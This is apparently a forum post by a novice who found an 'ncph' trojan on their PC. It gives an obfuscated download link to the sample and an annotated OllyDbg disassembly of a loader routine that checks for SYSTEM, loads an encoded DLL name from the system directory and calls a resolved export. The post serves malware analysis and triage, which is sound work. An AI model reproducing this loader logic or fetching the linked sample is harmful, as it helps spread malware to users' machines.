木马下载地址:
708K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4*7i4K6u0W2L8$3&6D9K9h3&6W2k6r3!0%4L8W2)9J5k6h3&6W2N6q4)9J5c8X3c8G2N6$3&6Q4x3V1k6F1j5%4m8Z5P5h3D9#2i4K6u0W2x3q4u0W2L8r3g2S2M7$3g2Q4x3X3g2J5j5i4t1`.
电脑莫名重启后，扫毒扫出个 ncph。本人是个新手，分析了一点就弄不下去了。
高手来分析下
;-----------------------------------------------------------------------
; OllyDbg disassembly dump (x86-32, Intel syntax). Columns: address,
; flow marker, opcode bytes, instruction, OllyDbg annotation.
; Routine at 00403E6C: no visible arguments; 0x2C bytes of locals, three
; of which ([ebp-2C], [ebp-28], [ebp-24]) hold string temporaries that are
; zeroed on entry and released together at 00403F8F before returning.
; Internal calls pass arguments in eax/edx, and the fs:[0] frame below is
; consistent with Borland/Delphi compiler output — TODO confirm against the
; PE's compiler signature.
; Behaviour grounded in the listed calls only:
;   1. GetUserNameA, result compared with "SYSTEM" via lstrcmpA (the
;      compare result is discarded as dumped — see note at 00403EBE).
;   2. If bl == 0: call 004035DC and 004036F0, then leave.
;   3. If bl == 1: call 00403BB8; if it returns non-zero in al, leave.
;   4. GetSystemDirectoryA into the 0x1000-byte buffer at 00406824, format
;      "%s\%s" from it and a decoded string, LoadLibraryA that path,
;      GetProcAddress a decoded export name, and call the export.
; The three constants ("LCEC...", "FCNC...", "GCAE...") each pass through
; 004038D8 before use, so they are stored encoded; their decoded values are
; not visible in this dump. For triage the chain GetSystemDirectoryA ->
; LoadLibraryA -> GetProcAddress -> call is the part worth logging.
;-----------------------------------------------------------------------
00403E6C > $ 55 push ebp
00403E6D . 8BEC mov ebp, esp
00403E6F . 83C4 D4 add esp, -2C ; 0x2C bytes of locals
00403E72 . 53 push ebx
00403E73 . 56 push esi
00403E74 . 33C0 xor eax, eax
; [ebp-2C], [ebp-28], [ebp-24] start as nil; they receive the three decoded
; strings (00403F66, 00403F3B, 00403F10) and are released at 00403F8F.
00403E76 . 8945 D4 mov dword ptr [ebp-2C], eax
00403E79 . 8945 D8 mov dword ptr [ebp-28], eax
00403E7C . 8945 DC mov dword ptr [ebp-24], eax
00403E7F . B8 243E4000 mov eax, 00403E24 ; argument for 00403378 (purpose not visible in this dump)
00403E84 . E8 EFF4FFFF call 00403378
00403E89 . BE 24684000 mov esi, 00406824 ; esi = static buffer, used below as the 0x1000-byte path buffer
; Install an fs:[0] (SEH) frame with handler 00403F9D; it is removed at 00403F82.
00403E8E . 33C0 xor eax, eax
00403E90 . 55 push ebp
00403E91 . 68 9D3F4000 push 00403F9D
00403E96 . 64:FF30 push dword ptr fs:[eax]
00403E99 . 64:8920 mov dword ptr fs:[eax], esp
00403E9C . B3 01 mov bl, 1 ; bl = "user is SYSTEM" flag, assumed true until cleared
00403E9E . 68 9C504000 push 0040509C ; /pBufCount = ag.0040509C
00403EA3 . 68 20674000 push 00406720 ; |Buffer = ag.00406720
00403EA8 . E8 7FF5FFFF call <jmp.&advapi32.GetUserNameA> ; \GetUserNameA
00403EAD . 68 AC3F4000 push 00403FAC ; /String2 = "SYSTEM"
00403EB2 . 68 20674000 push 00406720 ; |String1 = ""  (buffer was still empty when dumped)
00403EB7 . E8 40F6FFFF call <jmp.&kernel32.lstrcmpA> ; \lstrcmpA
00403EBC . 85C0 test eax, eax
; NOTE(review): as dumped this is an unconditional jmp, so the lstrcmpA
; result is discarded, bl stays 1 on every path and 00403EC0 is unreachable.
; A conditional jump here (e.g. jnz) would clear bl whenever the user is not
; SYSTEM — compare this byte with the file on disk before trusting the flow
; below; the dump may have been patched in the debugger.
00403EBE . EB 02 jmp short 00403EC2
00403EC0 . 33DB xor ebx, ebx ; bl = 0 — not reached in this dump
00403EC2 > 8BC3 mov eax, ebx
00403EC4 . 34 01 xor al, 1 ; al = !bl
00403EC6 . 84C0 test al, al
00403EC8 . 74 05 je short 00403ECF ; skip when bl == 1
00403ECA . E8 0DF7FFFF call 004035DC ; only when bl == 0 (body not in this dump)
00403ECF > 8BC3 mov eax, ebx
00403ED1 . 34 01 xor al, 1
00403ED3 . 84C0 test al, al
00403ED5 . 74 05 je short 00403EDC ; skip when bl == 1
00403ED7 . E8 14F8FFFF call 004036F0 ; only when bl == 0 (body not in this dump)
00403EDC > 80F3 01 xor bl, 1 ; bl = !bl
00403EDF . 84DB test bl, bl
00403EE1 . 0F85 9B000000 jnz 00403F82 ; flag was 0 -> leave; continue only when it was 1
00403EE7 . E8 CCFCFFFF call 00403BB8 ; returns a byte in al (meaning not visible here)
00403EEC . 84C0 test al, al
00403EEE . 0F85 8E000000 jnz 00403F82 ; non-zero -> leave without loading anything
00403EF4 . 68 00100000 push 1000 ; /BufSize = 1000 (4096.)
00403EF9 . 56 push esi ; |Buffer
00403EFA . E8 A5F5FFFF call <jmp.&kernel32.GetSystemDirector>; \GetSystemDirectoryA
; Two 8-byte value/tag records are built at [ebp-20] and [ebp-18] (dword
; value, tag byte 5 then 6) and 1 = (record count - 1) is pushed; together
; with the "%s\%s" format this looks like a Delphi open-array Format call
; writing into esi — TODO confirm by reading 00403800.
00403EFF . 6A 01 push 1
00403F01 . 8975 E0 mov dword ptr [ebp-20], esi ; record 0 value = system directory
00403F04 . C645 E4 05 mov byte ptr [ebp-1C], 5 ; record 0 tag
00403F08 . 8D55 DC lea edx, dword ptr [ebp-24] ; edx = &string temp (output of the decoder)
00403F0B . B8 BC3F4000 mov eax, 00403FBC ; ASCII "LCECFDNCICPFGFPELEFCNCNC"
00403F10 . E8 C3F9FFFF call 004038D8 ; decode eax -> [ebp-24] (decoder body not in this dump)
00403F15 . 8B45 DC mov eax, dword ptr [ebp-24]
00403F18 . E8 3BF1FFFF call 00403058 ; returns a char pointer in eax (see its use at 00403F73)
00403F1D . 8945 E8 mov dword ptr [ebp-18], eax ; | record 1 value = decoded string
00403F20 . C645 EC 06 mov byte ptr [ebp-14], 6 ; | record 1 tag
00403F24 . 8D45 E0 lea eax, dword ptr [ebp-20] ; |
00403F27 . 50 push eax ; |Arg3
00403F28 . 68 D83F4000 push 00403FD8 ; |Arg2 = 00403FD8 ASCII "%s\%s"
00403F2D . 56 push esi ; |Arg1
00403F2E . E8 CDF8FFFF call 00403800 ; \ag.00403800 ; esi presumably becomes "<sysdir>\<decoded string>"
; Second decoded constant, handed with the path buffer to 004039A0 and
; 00403A40; what those two do to esi is not visible in this dump.
00403F33 . 8D55 D8 lea edx, dword ptr [ebp-28]
00403F36 . B8 E83F4000 mov eax, 00403FE8 ; ASCII "FCNCNCDCICNCEC"
00403F3B . E8 98F9FFFF call 004038D8 ; decode -> [ebp-28]
00403F40 . 8B45 D8 mov eax, dword ptr [ebp-28]
00403F43 . E8 10F1FFFF call 00403058 ; eax = char pointer
00403F48 . 8BD6 mov edx, esi ; edx = path buffer
00403F4A . E8 51FAFFFF call 004039A0
00403F4F . 8BC6 mov eax, esi
00403F51 . E8 EAFAFFFF call 00403A40
00403F56 . 56 push esi ; /FileName = path assembled above
00403F57 . E8 50F5FFFF call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA
00403F5C . 8BD8 mov ebx, eax ; ebx = hModule; a NULL result is not checked before GetProcAddress
; Third decoded constant = export name for GetProcAddress.
00403F5E . 8D55 D4 lea edx, dword ptr [ebp-2C]
00403F61 . B8 00404000 mov eax, 00404000 ; ASCII "GCAEBJAGBJIICDBJEILI"
00403F66 . E8 6DF9FFFF call 004038D8 ; decode -> [ebp-2C]
00403F6B . 8B45 D4 mov eax, dword ptr [ebp-2C]
00403F6E . E8 E5F0FFFF call 00403058 ; eax = char pointer
00403F73 . 50 push eax ; /ProcNameOrOrdinal
00403F74 . 53 push ebx ; |hModule
00403F75 . E8 22F5FFFF call <jmp.&kernel32.GetProcAddress> ; \GetProcAddress
00403F7A . 8BD8 mov ebx, eax
00403F7C . 85DB test ebx, ebx
00403F7E . 74 02 je short 00403F82 ; export not found -> leave
00403F80 . FFD3 call ebx ; invoke the resolved export with no arguments
; Common exit: unhook the fs:[0] frame, then release the three string temps.
00403F82 > 33C0 xor eax, eax
00403F84 . 5A pop edx ; edx = saved fs:[0]
00403F85 . 59 pop ecx ; discard handler address 00403F9D
00403F86 . 59 pop ecx ; discard saved ebp
00403F87 . 64:8910 mov dword ptr fs:[eax], edx
00403F8A . 68 A43F4000 push 00403FA4 ; return address for the retn at 00403F9C; 00403FA4 is past this dump, presumably the real epilogue
00403F8F > 8D45 D4 lea eax, dword ptr [ebp-2C]
00403F92 . BA 03000000 mov edx, 3 ; release 3 consecutive string temps starting at [ebp-2C]
00403F97 . E8 1CEFFFFF call 00402EB8
00403F9C . C3 retn
; Exception path: 00403F9D is the handler installed at 00403E91.
00403F9D .^ E9 8EE9FFFF jmp 00402930
00403FA2 .^ EB EB jmp short 00403F8F ; after unwinding, run the same cleanup